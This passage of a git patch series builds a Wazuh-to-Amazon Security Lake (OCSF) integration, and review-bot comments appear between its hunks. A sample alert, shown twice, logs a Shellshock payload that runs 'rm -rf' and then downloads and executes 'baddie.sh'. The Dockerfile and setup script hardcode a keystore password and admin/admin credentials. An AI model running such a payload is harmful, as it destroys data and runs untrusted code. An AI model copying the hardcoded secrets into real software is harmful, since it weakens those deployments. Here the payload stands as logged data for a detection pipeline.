"GeoLocation": { - "city_name": "Amsterdam", - "country_name": "Netherlands", - "region_name": "North Holland", - "location": { - "lon": 4.9087, - "lat": 52.3534 - } - }, - "full_log": "000.111.222.10 - - [08/Feb/2024:11:35:12 -0300] \"GET /cgi-bin/jarrewrite.sh HTTP/1.1\" 404 162 \"-\" \"() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://0.0.0.0/baddie.sh; chmod 777 baddie.sh; ./baddie.sh'\"", - "timestamp": "2024-02-08T11:35:14.334-0300" - }, - "fields": { - "timestamp": [ - "2024-02-08T14:35:14.334Z" - ] - }, - "sort": [ - 1707402914334 - ] -} \ No newline at end of file diff --git a/integrations/amazon-security-lake/requirements.txt b/integrations/amazon-security-lake/requirements.txt index 8c7a1cbaae79b..8ebe50a4ef264 100644 --- a/integrations/amazon-security-lake/requirements.txt 
+++ b/integrations/amazon-security-lake/requirements.txt @@ -1,2 +1,3 @@ pyarrow>=10.0.1 -parquet-tools>=0.2.15 \ No newline at end of file +parquet-tools>=0.2.15 +pydantic==2.6.1 \ No newline at end of file diff --git a/integrations/amazon-security-lake/run.py b/integrations/amazon-security-lake/run.py new file mode 100644 index 0000000000000..d8234226bf98e --- /dev/null +++ b/integrations/amazon-security-lake/run.py @@ -0,0 +1,34 @@ +import transform +import json + + +def _test(): + ocsf_event = {} + with open("./wazuh-event.sample.json", "r") as fd: + # Load from file descriptor + raw_event = json.load(fd) + try: + event = transform.converter.from_json(raw_event) + print(event) + ocsf_event = transform.converter.to_detection_finding(event) + print("") + print("--") + print("") + print(ocsf_event) + # event = Event.model_validate_json(json.dumps(event)) + # print(event) + # ocsf_event = to_detection_finding(event) + + except KeyError as e: + raise (e) + # except ValidationError as e: + # print(e) + + # if ocsf_event: + # with open("wazuh-event.ocsf.json", "w") as fd: + # json.dump(ocsf_event.model_dump(), fd) + # print(ocsf_event.model_dump()) + + +if __name__ == '__main__': + _test() diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index eee82036c3ff5..ab399f58b7b9a 100755 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -7,8 +7,9 @@ import time import json import datetime -from pyarrow import parquet, Table -from ocsf import converter +from pyarrow import parquet, Table, fs + +from transform import converter block_ending = { "block_ending": True } diff --git a/integrations/amazon-security-lake/transform/__init__.py b/integrations/amazon-security-lake/transform/__init__.py new file mode 100644 index 0000000000000..6e8733a32b85d --- /dev/null 
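Review bot: `except KeyError as e: raise (e)` in `_test` is a no-op handler (it re-raises the same exception) and can go together with the commented-out alternatives below it. `transform.converter.from_json` prints on a `ValidationError` and returns `None` (see its hunk in this commit), so the next line, `transform.converter.to_detection_finding(event)`, fails with `AttributeError` on an invalid sample instead of showing the validation message; checking `event is None` here, or letting `from_json` raise, keeps the real error visible. `open("./wazuh-event.sample.json", "r")` resolves against the current working directory, so the script only works when started from its own folder; `pathlib.Path(__file__).with_name("wazuh-event.sample.json")` removes that dependency.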
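Review bot: The switch to `from transform import converter` leaves `map_block` (outside this hunk, untouched by the other hunks on this page) calling `converter.convert(alert)`, but the new `transform/converter.py` defines `from_json` and `to_detection_finding` and no `convert`, so the first alert read from stdin raises `AttributeError`. The call needs to become something like `ocsf_mapped_alert = converter.to_detection_finding(converter.from_json(alert)).model_dump()`, the `.model_dump()` being needed because `Table.from_pylist` consumes dicts rather than pydantic models. `fs` is newly imported from `pyarrow` but not used in any hunk shown here.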
+++ b/integrations/amazon-security-lake/transform/__init__.py
@@ -0,0 +1 @@
+import transform.converter
diff --git a/integrations/amazon-security-lake/transform/converter.py b/integrations/amazon-security-lake/transform/converter.py
new file mode 100644
index 0000000000000..983ba9572841f
--- /dev/null
+++ b/integrations/amazon-security-lake/transform/converter.py
@@ -0,0 +1,112 @@ +import json + +import pydantic +import transform.models as models + + +def normalize(level: int) -> int: + """ + Normalizes rule level into the 0-6 range, required by OCSF. + """ + # TODO normalization + return level + + +def join(iterable, separator=","): + return (separator.join(iterable)) + + +def to_detection_finding(event: models.wazuh.Event) -> models.ocsf.DetectionFinding: + finding_info = models.ocsf.FindingInfo( + analytic=models.ocsf.AnalyticInfo( + category=", ".join(event.rule.groups), + name=event.decoder.name, + type_id=1, + uid=event.rule.id + ), + attacks=models.ocsf.AttackInfo( + tactic=models.ocsf.TechniqueInfo( + name=", ".join(event.rule.mitre.tactic), + uid=", ".join(event.rule.mitre.id) + ), + technique=models.ocsf.TechniqueInfo( + name=", ".join(event.rule.mitre.technique), + uid=", ".join(event.rule.mitre.id) + ), + version="v13.1" + ), + title=event.rule.description, + types=[event.input.type], + uid=event.id + ) + + metadata = models.ocsf.Metadata( + log_name="Security events", + log_provider="Wazuh", + product=models.ocsf.ProductInfo( + name="Wazuh", + lang="en", + vendor_name="Wazuh, Inc,." 
+ ), + version="1.1.0" + ) + + resources = [models.ocsf.Resource( + name=event.agent.name, uid=event.agent.id)] + + severity_id = normalize(event.rule.level) + + unmapped = { + "data_sources": [ + event.location, + event.manager.name + ], + "nist": event.rule.nist_800_53 # Array + } + + return models.ocsf.DetectionFinding( + count=event.rule.firedtimes, + message=event.rule.description, + finding_info=finding_info, + metadata=metadata, + raw_data=event.full_log, + resources=resources, + risk_score=event.rule.level, + severity_id=severity_id, + time=event.timestamp, + unmapped=unmapped + ) + + +def from_json(event: dict) -> models.wazuh.Event: + # Needs to a string, bytes or bytearray + try: + return models.wazuh.Event.model_validate_json(json.dumps(event)) + except pydantic.ValidationError as e: + print(e) + + +def _test(): + ocsf_event = {} + with open("wazuh-event.sample.json", "r") as fd: + # Load from file descriptor + event = json.load(fd) + try: + # Create instance of Event from JSON input (must be string, bytes or bytearray) + event = models.wazuh.Event.model_validate_json(json.dumps(event)) + print(event) + ocsf_event = to_detection_finding(event) + + except KeyError as e: + raise (e) + except pydantic.ValidationError as e: + print(e) + + if ocsf_event: + with open("wazuh-event.ocsf.json", "w") as fd: + json.dump(ocsf_event.model_dump(), fd) + print(ocsf_event.model_dump()) + + +if __name__ == '__main__': + _test() diff --git a/integrations/amazon-security-lake/transform/legacy/legacy_converter.py b/integrations/amazon-security-lake/transform/legacy/legacy_converter.py new file mode 100644 index 0000000000000..2a14b75957c97 --- /dev/null +++ b/integrations/amazon-security-lake/transform/legacy/legacy_converter.py 
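Review bot: `from_json` swallows `pydantic.ValidationError`: it prints the error and falls off the end, returning `None`, so callers receive a `None` event and fail later with an unrelated `AttributeError`; a `raise` after the print (or `raise ValueError("invalid Wazuh event") from e`) keeps the failure at the parse site. `normalize` still returns `level` unchanged although its docstring promises the 0-6 range OCSF requires, so `severity_id` is simply the Wazuh rule level; until the mapping exists, a `# FIXME: Wazuh levels above 6 are passed through unmapped` on the `severity_id = normalize(event.rule.level)` line would warn readers. `vendor_name="Wazuh, Inc,."` has a misplaced comma (`"Wazuh, Inc."`), and `_test` duplicates the `run.py` added in the same commit. Both `tactic` and `technique` are given `uid=", ".join(event.rule.mitre.id)`; presumably those ids belong to the techniques only — confirm against the Wazuh alert schema.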
@@ -0,0 +1,87 @@ +#!/usr/bin/python + +# event comes from Filebeat +event = {} + + +def normalize(level: int) -> int: + """ + Normalizes rule level into the 0-6 range, required by OCSF. + """ + # TODO normalization + return level + + +def join(iterable, separator=","): + return (separator.join(iterable)) + + +def convert(event: dict) -> dict: + """ + Converts Wazuh events to OCSF's Detecting Finding (2004) class. + """ + ocsf_class_template = \ + { + "activity_id": 1, + "category_name": "Findings", + "category_uid": 2, + "class_name": "Detection Finding", + "class_uid": 2004, + "count": event["rule"]["firedtimes"], + "message": event["rule"]["description"], + "finding_info": { + "analytic": { + "category": join(event["rule"]["groups"]), + "name": event["decoder"]["name"], + "type_id": 1, + "uid": event["rule"]["id"], + }, + "attacks": { + "tactic": { + "name": join(event["rule"]["mitre"]["tactic"]), + }, + "technique": { + "name": join(event["rule"]["mitre"]["technique"]), + "uid": join(event["rule"]["mitre"]["id"]), + }, + "version": "v13.1" + }, + "title": event["rule"]["description"], + "types": [ + event["input"]["type"] + ], + "uid": event['id'] + }, + "metadata": { + "log_name": "Security events", + "log_provider": "Wazuh", + "product": { + "name": "Wazuh", + "lang": "en", + "vendor_name": "Wazuh, Inc,." + }, + "version": "1.1.0", + }, + "raw_data": event["full_log"], + "resources": [ + { + "name": event["agent"]["name"], + "uid": event["agent"]["id"] + }, + ], + "risk_score": event["rule"]["level"], + "severity_id": normalize(event["rule"]["level"]), + "status_id": 99, + "time": event["timestamp"], + "type_uid": 200401, + "unmapped": { + "data_sources": [ + event["_index"], + event["location"], + event["manager"]["name"] + ], + "nist": event["rule"]["nist_800_53"], # Array + } + } + + return ocsf_class_template 
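Review bot: The module-level `event = {}` is a dead placeholder: `convert` takes `event` as a parameter and nothing reads the global, so it should go along with the `# event comes from Filebeat` comment. `event["rule"]["nist_800_53"]` and `event["rule"]["mitre"]` are indexed unconditionally, so any alert whose rule lacks those sections raises `KeyError` (the sample event has them; many rules may not — confirm); `event["rule"].get("nist_800_53", [])` would degrade gracefully. `"vendor_name": "Wazuh, Inc,."` carries the same misplaced comma as the new converter.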
diff --git a/integrations/amazon-security-lake/ocsf/test.py b/integrations/amazon-security-lake/transform/legacy/legacy_test.py similarity index 57% rename from integrations/amazon-security-lake/ocsf/test.py rename to integrations/amazon-security-lake/transform/legacy/legacy_test.py index e7d947848b067..ebcb8fa4b2e90 100644 --- a/integrations/amazon-security-lake/ocsf/test.py +++ b/integrations/amazon-security-lake/transform/legacy/legacy_test.py @@ -1,15 +1,15 @@ #!/usr/bin/python -from converter import convert +from transform.legacy.converter import convert import json converted_event = {} -with open("wazuh-event.sample.json", "r") as fd: +with open("../wazuh-event.sample.json", "r") as fd: sample_event = json.load(fd) # print(json.dumps(sample_event, indent=4)) converted_event = convert(sample_event) - + if converted_event: - with open("wazuh-event.ocsf.json", "w") as fd: + with open("../wazuh-event.ocsf.json", "w") as fd: json.dump(converted_event, fd) - print("Done") \ No newline at end of file + print("Done") diff --git a/integrations/amazon-security-lake/transform/models/__init__.py b/integrations/amazon-security-lake/transform/models/__init__.py new file mode 100644 index 0000000000000..2fdec7bc648af --- /dev/null +++ b/integrations/amazon-security-lake/transform/models/__init__.py @@ -0,0 +1,2 @@ +import transform.models.wazuh +import transform.models.ocsf diff --git a/integrations/amazon-security-lake/transform/models/ocsf.py b/integrations/amazon-security-lake/transform/models/ocsf.py new file mode 100644 index 0000000000000..4918b6e29081c --- /dev/null +++ b/integrations/amazon-security-lake/transform/models/ocsf.py 
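Review bot: `from transform.legacy.converter import convert` does not match the module this commit creates, `transform/legacy/legacy_converter.py`, so the test fails with `ModuleNotFoundError`; it should read `from transform.legacy.legacy_converter import convert`. The diffstat lists no `transform/legacy/__init__.py`, so the import also relies on namespace-package resolution — add the file if `transform.legacy` is meant to be a regular package like its siblings. `"../wazuh-event.sample.json"` resolves relative to the current directory, so the test only runs from inside `transform/legacy`.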
@@ -0,0 +1,66 @@
+import pydantic
+import typing
+
+
+class AnalyticInfo(pydantic.BaseModel):
+ category: str
+ name: str
+ type_id: int
+ uid: str
+
+
+class TechniqueInfo(pydantic.BaseModel):
+ name: str
+ uid: str
+
+
+class AttackInfo(pydantic.BaseModel):
+ tactic: TechniqueInfo
+ technique: TechniqueInfo
+ version: str
+
+
+class FindingInfo(pydantic.BaseModel):
+ analytic: AnalyticInfo
+ attacks: AttackInfo
+ title: str
+ types: typing.List[str]
+ uid: str
+
+
+class ProductInfo(pydantic.BaseModel):
+ name: str
+ lang: str
+ vendor_name: str
+
+
+class Metadata(pydantic.BaseModel):
+ log_name: str
+ log_provider: str
+ product: ProductInfo
+ version: str
+
+
+class Resource(pydantic.BaseModel):
+ name: str
+ uid: str
+
+
+class DetectionFinding(pydantic.BaseModel):
+ activity_id: int = 1
+ category_name: str = "Findings"
+ category_uid: int = 2
+ class_name: str = "Detection Finding"
+ class_uid: int = 2004
+ count: int
+ message: str
+ finding_info: FindingInfo
+ metadata: Metadata
+ raw_data: str
+ resources: typing.List[Resource]
+ risk_score: int
+ severity_id: int
+ status_id: int = 99
+ time: str
+ type_uid: int = 200401
+ unmapped: typing.Dict[str, typing.List[str]] = pydantic.Field()
diff --git a/integrations/amazon-security-lake/transform/models/wazuh.py b/integrations/amazon-security-lake/transform/models/wazuh.py
new file mode 100644
index 0000000000000..34aa3c91e96e1
--- /dev/null
+++ b/integrations/amazon-security-lake/transform/models/wazuh.py
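Review bot: `severity_id: int` on `DetectionFinding` carries no range constraint, so a raw Wazuh rule level (which runs well past 6, and which the legacy converter in this series copies straight into `severity_id` because its `normalize` is still a TODO) validates cleanly and would reach Security Lake as an out-of-range OCSF enum value; the same applies to `status_id` and `activity_id`. Since this model is the last check before data leaves the pipeline, pin the enum: `severity_id: int = pydantic.Field(ge=0, le=6)`. Two smaller points: `AttackInfo.tactic` is typed `TechniqueInfo`, which requires `uid`, while the legacy converter only fills `name` for the tactic, so that shape will fail validation if the new transform mirrors it; and `time: str` is presumably meant to hold the ISO timestamp from the event, whereas OCSF `time` is numeric — worth confirming against the schema before the field is relied on.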
@@ -0,0 +1,50 @@
+import pydantic
+import typing
+
+# =========== Wazuh event models =========== #
+# These are only the fields required for the integration.
+
+
+class Mitre(pydantic.BaseModel):
+ technique: typing.List[str] = []
+ id: typing.List[str] = ""
+ tactic: typing.List[str] = []
+
+
+class Rule(pydantic.BaseModel):
+ firedtimes: int = 0
+ description: str = ""
+ groups: typing.List[str] = []
+ id: str = ""
+ mitre: Mitre = Mitre()
+ level: int = 0
+ nist_800_53: typing.List[str] = []
+
+
+class Decoder(pydantic.BaseModel):
+ name: str
+
+
+class Input(pydantic.BaseModel):
+ type: str
+
+
+class Agent(pydantic.BaseModel):
+ name: str
+ id: str
+
+
+class Manager(pydantic.BaseModel):
+ name: str
+
+
+class Event(pydantic.BaseModel):
+ rule: Rule = {}
+ decoder: Decoder = {}
+ input: Input = {}
+ id: str = ""
+ full_log: str = ""
+ agent: Agent = {}
+ timestamp: str = ""
+ location: str = ""
+ manager: Manager = {}
diff --git a/integrations/amazon-security-lake/wazuh-event.sample.json b/integrations/amazon-security-lake/wazuh-event.sample.json
new file mode 100644
index 0000000000000..d7e0558b62c62
--- /dev/null
+++ b/integrations/amazon-security-lake/wazuh-event.sample.json
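Review bot: `Mitre.id` is annotated `typing.List[str]` but defaulted to `""`, and the nested `Event` fields (`rule`, `decoder`, `input`, `agent`, `manager`) default to `{}` rather than model instances; pydantic does not validate defaults unless told to, so an event from the indexer that lacks one of those keys produces a plain dict or str in that slot and attribute access such as `event.rule.level` fails downstream instead of at the validation boundary these models are meant to be. Make the defaults agree with the types: `id: typing.List[str] = []` and `rule: Rule = pydantic.Field(default_factory=Rule)` (pydantic copies mutable defaults per instance, so the `[]` defaults are fine). `Decoder`, `Input`, `Agent` and `Manager` all have required fields, so their `Event` slots should either be required too or be `typing.Optional[...] = None` with the transform handling `None` explicitly.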
@@ -0,0 +1,76 @@ +{ + "input": { + "type": "log" + }, + "agent": { + "name": "redacted.com", + "id": "000" + }, + "manager": { + "name": "redacted.com" + }, + "data": { + "protocol": "GET", + "srcip": "000.111.222.10", + "id": "404", + "url": "/cgi-bin/jarrewrite.sh" + }, + "rule": { + "firedtimes": 1, + "mail": false, + "level": 6, + "pci_dss": [ + "11.4" + ], + "tsc": [ + "CC6.1", + "CC6.8", + "CC7.2", + "CC7.3" + ], + "description": "Shellshock attack attempt", + "groups": [ + "web", + "accesslog", + "attack" + ], + "mitre": { + "technique": [ + "Exploitation for Privilege Escalation", + "Exploit Public-Facing Application" + ], + "id": [ + "T1068", + "T1190" + ], + "tactic": [ + "Privilege Escalation", + "Initial Access" + ] + }, + "id": "31166", + "nist_800_53": [ + "SI.4" + ], + "info": "CVE-2014-6271https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271", + "gdpr": [ + "IV_35.7.d" + ] + }, + "location": "/var/log/nginx/access.log", + "decoder": { + "name": "web-accesslog" + }, + "id": "1707402914.872885", + "GeoLocation": { + "city_name": "Amsterdam", + "country_name": "Netherlands", + "region_name": "North Holland", + "location": { + "lon": 4.9087, + "lat": 52.3534 + } + }, + "full_log": "000.111.222.10 - - [08/Feb/2024:11:35:12 -0300] \"GET /cgi-bin/jarrewrite.sh HTTP/1.1\" 404 162 \"-\" \"() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://0.0.0.0/baddie.sh; chmod 777 baddie.sh; ./baddie.sh'\"", + "timestamp": "2024-02-08T11:35:14.334-0300" +} \ No newline at end of file From 05ae2d15a92777e885cc3890ebf94ac2bab65b1f Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Thu, 22 Feb 2024 15:49:49 +0100 Subject: [PATCH 48/77] Create minimal Docker environment to test and develop the integration. --- integrations/.gitignore | 5 + integrations/README.md | 32 ++++ .../amazon-security-lake/.dockerignore | 180 ++++++++++++++++++ integrations/amazon-security-lake/Dockerfile | 41 ++++ integrations/amazon-security-lake/README.md | 15 +- .../logstash/pipeline/indexer-to-file.conf | 26 +++ ...output.conf => indexer-to-integrator.conf} | 0 .../{wazuh-s3.conf => indexer-to-s3.conf} | 0 .../amazon-security-lake/logstash/setup.sh | 11 +- integrations/amazon-security-lake/run.py | 2 + .../stdin_to_securitylake.py | 2 +- .../amazon-security-lake.yml} | 29 ++- .../tools/events-generator/.dockerignore | 2 + .../tools/events-generator/Dockerfile | 4 + integrations/tools/events-generator/README.md | 11 ++ integrations/tools/events-generator/run.py | 13 +- 16 files changed, 349 insertions(+), 24 deletions(-) create mode 100644 integrations/.gitignore create mode 100644 integrations/README.md create mode 100644 integrations/amazon-security-lake/.dockerignore create mode 100644 integrations/amazon-security-lake/Dockerfile create mode 100644 integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf rename integrations/amazon-security-lake/logstash/pipeline/{pipe-output.conf => indexer-to-integrator.conf} (100%) rename integrations/amazon-security-lake/logstash/pipeline/{wazuh-s3.conf => indexer-to-s3.conf} (100%) rename integrations/{amazon-security-lake/docker-compose.yml => docker/amazon-security-lake.yml} (69%) create mode 100644 integrations/tools/events-generator/.dockerignore create mode 100644 integrations/tools/events-generator/Dockerfile diff --git a/integrations/.gitignore b/integrations/.gitignore new file mode 100644 index 0000000000000..8f10b6459740c --- /dev/null +++ b/integrations/.gitignore @@ -0,0 +1,5 @@ +elastic +opensearch +splunk +common +config \ No newline at end of file 
diff --git a/integrations/README.md b/integrations/README.md
new file mode 100644
index 0000000000000..5e69b4f673d6c
--- /dev/null
+++ b/integrations/README.md
@@ -0,0 +1,32 @@
+## Wazuh indexer integrations
+
+This folder contains integrations with third-party XDR, SIEM and cybersecurity software.
+The goal is to transport Wazuh's analysis to the platform that suits your needs.
+
+### Amazon Security Lake
+
+TBD
+
+##### Usage
+
+A demo of the integration can be started using the content of this folder and Docker.
+
+```console
+docker compose -f ./docker/amazon-security-lake.yml up -d
+```
+
+This docker compose project will bring a *wazuh-indexer* node, a *wazuh-dashboard* node,
+a *logstash* node and our event generator. On the one hand, the event generator will push events
+constantly to the indexer. On the other hand, logstash will constantly query for new data and
+deliver it to the integration Python program, also present in that node. Finally, the integration
+module will prepare and send the data to the Amazon Security Lake's S3 bucket.
+
+
+For production usage, follow the instructions in our documentation page about this matter.
+(_when-its-done_)
+
+As a last note, we would like to point out that we also use this Docker environment for development.
+
+### Other integrations
+
+TBD
diff --git a/integrations/amazon-security-lake/.dockerignore b/integrations/amazon-security-lake/.dockerignore
new file mode 100644
index 0000000000000..891ff7a135014
--- /dev/null
+++ b/integrations/amazon-security-lake/.dockerignore
@@ -0,0 +1,180 @@ +wazuh-event.ocsf.json +*.parquet +Dockerfile + +# Created by https://www.toptal.com/developers/gitignore/api/python +# Edit at https://www.toptal.com/developers/gitignore?templates=python + +### Python ### +# Byte-compiled / optimized / DLL files +__pycache__/ +*.py[cod] +*$py.class + +# C extensions +*.so + +# Distribution / packaging +.Python +build/ +develop-eggs/ +dist/ +downloads/ +eggs/ +.eggs/ +lib/ +lib64/ +parts/ +sdist/ +var/ +wheels/ +share/python-wheels/ +*.egg-info/ +.installed.cfg +*.egg +MANIFEST + +# PyInstaller +# Usually these files are written by a python script from a template +# before PyInstaller builds the exe, so as to inject date/other infos into it. +*.manifest +*.spec + +# Installer logs +pip-log.txt +pip-delete-this-directory.txt + +# Unit test / coverage reports +htmlcov/ +.tox/ +.nox/ +.coverage +.coverage.* +.cache +nosetests.xml +coverage.xml +*.cover +*.py,cover +.hypothesis/ +.pytest_cache/ +cover/ + +# Translations +*.mo +*.pot + +# Django stuff: +*.log +local_settings.py +db.sqlite3 +db.sqlite3-journal + +# Flask stuff: +instance/ +.webassets-cache + +# Scrapy stuff: +.scrapy + +# Sphinx documentation +docs/_build/ + +# PyBuilder +.pybuilder/ +target/ + +# Jupyter Notebook +.ipynb_checkpoints + +# IPython +profile_default/ +ipython_config.py + +# pyenv +# For a library or package, you might want to ignore these files since the code is +# intended to run in multiple environments; otherwise, check them in: +# .python-version + +# pipenv +# According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. +# However, in case of collaboration, if having platform-specific dependencies or dependencies +# having no cross-platform support, pipenv may install dependencies that don't work, or not +# install all needed dependencies. +#Pipfile.lock + +# poetry +# Similar to Pipfile.lock, it is generally recommended to include poetry.lock in version control. 
+# This is especially recommended for binary packages to ensure reproducibility, and is more +# commonly ignored for libraries. +# https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control +#poetry.lock + +# pdm +# Similar to Pipfile.lock, it is generally recommended to include pdm.lock in version control. +#pdm.lock +# pdm stores project-wide configurations in .pdm.toml, but it is recommended to not include it +# in version control. +# https://pdm.fming.dev/#use-with-ide +.pdm.toml + +# PEP 582; used by e.g. github.com/David-OConnor/pyflow and github.com/pdm-project/pdm +__pypackages__/ + +# Celery stuff +celerybeat-schedule +celerybeat.pid + +# SageMath parsed files +*.sage.py + +# Environments +.env +.venv +env/ +venv/ +ENV/ +env.bak/ +venv.bak/ + +# Spyder project settings +.spyderproject +.spyproject + +# Rope project settings +.ropeproject + +# mkdocs documentation +/site + +# mypy +.mypy_cache/ +.dmypy.json +dmypy.json + +# Pyre type checker +.pyre/ + +# pytype static type analyzer +.pytype/ + +# Cython debug symbols +cython_debug/ + +# PyCharm +# JetBrains specific template is maintained in a separate JetBrains.gitignore that can +# be found at https://github.com/github/gitignore/blob/main/Global/JetBrains.gitignore +# and can be added to the global gitignore or merged into this file. For a more nuclear +# option (not recommended) you can uncomment the following to ignore the entire idea folder. +#.idea/ + +### Python Patch ### +# Poetry local configuration file - https://python-poetry.org/docs/configuration/#local-configuration +poetry.toml + +# ruff +.ruff_cache/ + +# LSP config files +pyrightconfig.json + +# End of https://www.toptal.com/developers/gitignore/api/python \ No newline at end of file diff --git a/integrations/amazon-security-lake/Dockerfile b/integrations/amazon-security-lake/Dockerfile new file mode 100644 index 0000000000000..a2eec0f8d6075 --- /dev/null +++ b/integrations/amazon-security-lake/Dockerfile 
@@ -0,0 +1,41 @@
+# MULTI-STAGE build
+
+FROM python:3.9 as builder
+# Create a virtualenv for dependencies. This isolates these packages from
+# system-level packages.
+RUN python3 -m venv /env
+# Setting these environment variables are the same as running
+# source /env/bin/activate.
+ENV VIRTUAL_ENV /env
+ENV PATH /env/bin:$PATH
+# Copy the application's requirements.txt and run pip to install all
+# dependencies into the virtualenv.
+COPY requirements.txt /app/requirements.txt
+RUN pip install -r /app/requirements.txt
+
+
+FROM python:3.9
+ENV LOGSTASH_KEYSTORE_PASS="SecretPassword"
+# Add the application source code.
+COPY --chown=logstash:logstash . /home/app
+# Add execution persmissions.
+RUN chmod a+x /home/app/run.py
+# Copy the application's dependencies.
+COPY --from=builder /env /env
+
+# Install Logstash
+RUN apt-get update && apt-get install -y iputils-ping wget gpg apt-transport-https
+RUN wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | gpg --dearmor -o /usr/share/keyrings/elastic-keyring.gpg && \
+ echo "deb [signed-by=/usr/share/keyrings/elastic-keyring.gpg] https://artifacts.elastic.co/packages/8.x/apt stable main" | tee -a /etc/apt/sources.list.d/elastic-8.x.list && \
+ apt-get update && apt install -y logstash
+# Install logstash-input-opensearch plugin.
+RUN /usr/share/logstash/bin/logstash-plugin install logstash-input-opensearch
+# Copy the Logstash's ingestion pipelines.
+COPY --chown=logstash:logstash logstash/pipeline /usr/share/logstash/pipeline
+# Grant logstash ownership over its files
+RUN chown --recursive logstash:logstash /usr/share/logstash /etc/logstash /var/log/logstash /var/lib/logstash
+
+USER logstash
+# Copy and run the setup.sh script to create and configure a keystore for Logstash.
+COPY --chown=logstash:logstash logstash/setup.sh /usr/share/logstash/bin/setup.sh
+RUN bash /usr/share/logstash/bin/setup.sh
\ No newline at end of file
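Review bot: `ENV LOGSTASH_KEYSTORE_PASS="SecretPassword"` bakes the keystore password into the image metadata, where `docker inspect` and `docker history` expose it and every container inherits it, and the final `RUN bash /usr/share/logstash/bin/setup.sh` then writes the keystore — with whatever credentials setup.sh feeds it — into an image layer, so the image ships its secrets. Build the keystore at container start from runtime-supplied variables (compose `environment`/`env_file` or a Docker secret) and drop the `ENV` line; if the keystore truly must exist at build time, pass the password with `RUN --mount=type=secret,id=keystore_pass ...` instead of `ENV`. Separately, `COPY --chown=logstash:logstash . /home/app` runs before `apt install -y logstash` creates that user, which I would expect to fail the build with an "unable to find user logstash" error — move that `COPY` below the Logstash install, or `chown` afterwards. Minor: the same `RUN` that installs packages should end with `rm -rf /var/lib/apt/lists/*` to keep the apt cache out of the layer.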
diff --git a/integrations/amazon-security-lake/README.md b/integrations/amazon-security-lake/README.md
index 46eee1b92a4b0..1dbe1dd4ebb23 100644
--- a/integrations/amazon-security-lake/README.md
+++ b/integrations/amazon-security-lake/README.md
@@ -46,4 +46,17 @@ sudo -E /usr/share/logstash/bin/logstash -f /etc/logstash/conf.d/wazuh-s3.conf -
 # Start Logstash
 sudo systemctl enable logstash
 sudo systemctl start logstash
-```
\ No newline at end of file
+```
+
+
+### Building the Docker image
+
+```console
+docker build -t wazuh/indexer-security-lake-integration:latest . --progress=plain
+```
+
+
+Run with:
+```console
+docker run -it --name=wazuh-indexer-security-lake-integration --rm wazuh/indexer-security-lake-integration ls
+```
diff --git a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf
new file mode 100644
index 0000000000000..e3fa60a785372
--- /dev/null
+++ b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf
@@ -0,0 +1,26 @@
+input {
+ opensearch {
+ hosts => ["opensearch-node:9200"]
+ user => "${INDEXER_USERNAME}"
+ password => "${INDEXER_PASSWORD}"
+ ssl => false
+ index => "wazuh-alerts-4.x-*"
+ query => '{
+ "query": {
+ "range": {
+ "@timestamp": {
+ "gt": "now-1m"
+ }
+ }
+ }
+ }'
+ target => "_source"
+ schedule => "* * * * *"
+ }
+}
+
+output {
+ file {
+ path => "/usr/share/logstash/pipeline/indexer-to-file.json"
+ }
+}
diff --git a/integrations/amazon-security-lake/logstash/pipeline/pipe-output.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf
similarity index 100%
rename from integrations/amazon-security-lake/logstash/pipeline/pipe-output.conf
rename to integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf
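Review bot: `ssl => false` in the `opensearch` input of indexer-to-file.conf sends `${INDEXER_USERNAME}`/`${INDEXER_PASSWORD}` as cleartext basic-auth to `opensearch-node:9200`, which is only acceptable inside the throwaway compose network; keep TLS on by default (`ssl => true` plus the plugin's CA-file option pointed at the indexer's root CA) or at least mark the line: `ssl => false  # demo only: credentials travel in cleartext; enable TLS outside the compose network`. The `file` output also writes `indexer-to-file.json` into `/usr/share/logstash/pipeline`, the directory the compose file bind-mounts from the repository's `logstash/pipeline`, so the dumped alerts land in the source tree and can be committed by accident — write to `/tmp` or a dedicated data path instead. Last, a `now-1m` window polled on a `* * * * *` schedule will, depending on scheduler jitter, either re-read or skip events at the minute boundary; if this pipeline is meant for anything beyond eyeballing output, track the last seen `@timestamp` rather than a fixed window.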
diff --git a/integrations/amazon-security-lake/logstash/pipeline/wazuh-s3.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-s3.conf similarity index 100% rename from integrations/amazon-security-lake/logstash/pipeline/wazuh-s3.conf rename to integrations/amazon-security-lake/logstash/pipeline/indexer-to-s3.conf diff --git a/integrations/amazon-security-lake/logstash/setup.sh b/integrations/amazon-security-lake/logstash/setup.sh index 2b1fc109f401a..9527f1fa58362 100644 --- a/integrations/amazon-security-lake/logstash/setup.sh +++ b/integrations/amazon-security-lake/logstash/setup.sh @@ -4,12 +4,7 @@ # indexer's credentials. NOTE: works only for dockerized logstash. # Source: https://www.elastic.co/guide/en/logstash/current/keystore.html -# Prepare keystore -set +o history -export LOGSTASH_KEYSTORE_PASS="SecretPassword" -set -o history - # Create keystore -/usr/share/logstash/bin/logstash-keystore create -echo "admin" | /usr/share/logstash/bin/logstash-keystore add INDEXER_USERNAME -echo "admin" | /usr/share/logstash/bin/logstash-keystore add INDEXER_PASSWORD +/usr/share/logstash/bin/logstash-keystore create --path.settings /etc/logstash +echo "admin" | /usr/share/logstash/bin/logstash-keystore add INDEXER_USERNAME --path.settings /etc/logstash +echo "admin" | /usr/share/logstash/bin/logstash-keystore add INDEXER_PASSWORD --path.settings /etc/logstash diff --git a/integrations/amazon-security-lake/run.py b/integrations/amazon-security-lake/run.py index d8234226bf98e..515d1d97610f9 100644 --- a/integrations/amazon-security-lake/run.py +++ b/integrations/amazon-security-lake/run.py @@ 